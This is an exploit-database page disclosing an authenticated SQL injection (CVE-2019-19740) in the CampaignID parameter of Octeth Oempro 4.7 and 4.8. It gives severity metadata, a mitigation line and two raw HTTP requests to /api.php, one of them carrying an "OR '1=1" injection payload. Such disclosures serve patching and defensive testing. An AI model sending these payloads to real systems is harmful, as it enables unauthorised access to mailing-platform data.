header-logo
Suggest Exploit
vendor:
Oempro
by:
Bruno de Barros Bulle
9.8
CVSS
CRITICAL
SQL Injection
89
CWE
Product Name: Oempro
Affected Version From: Octeth Oempro v.4.7
Affected Version To: Octeth Oempro v.4.8
Patch Exists: YES
Related CWE: CVE-2019-19740
CPE: a:octeth:oempro
Metasploit:
Other Scripts:
Platforms Tested:
2020

Octeth Oempro 4.8 – ‘CampaignID’ SQL Injection

An authenticated user can easily exploit this vulnerability. Octeth Oempro 4.7 and 4.8 allow SQL injection. The parameter CampaignID in Campaign.Get is vulnerable.

Mitigation:

Implement proper input validation and parameterized queries to prevent SQL injection attacks.
Source

Exploit-DB raw data:

# Exploit Title: Octeth Oempro 4.8 - 'CampaignID' SQL Injection
# Date: 2020-01-27
# Exploit Author: Bruno de Barros Bulle (www.xlabs.com.br)
# Vendor Homepage: www2.octeth.com
# Version: Octeth Oempro v.4.7 and v.4.8
# Tested on: Oempro v.4.7
# CVE : CVE-2019-19740


An authenticated user can easily exploit this vulnerability. Octeth Oempro
4.7 and 4.8 allow SQL injection. The parameter CampaignID in Campaign.Get
is vulnerable.

# Error condition
POST /api.php HTTP/1.1
Host: 127.0.0.1

command=Campaign.Get&CampaignID=2019'&responseformat=JSON

# SQL Injection exploitation
POST /api.php HTTP/1.1
Host: 127.0.0.1

command=Campaign.Get&CampaignID=2019 OR '1=1&responseformat=JSON

Navigation

Suggest Exploit

Services By CQR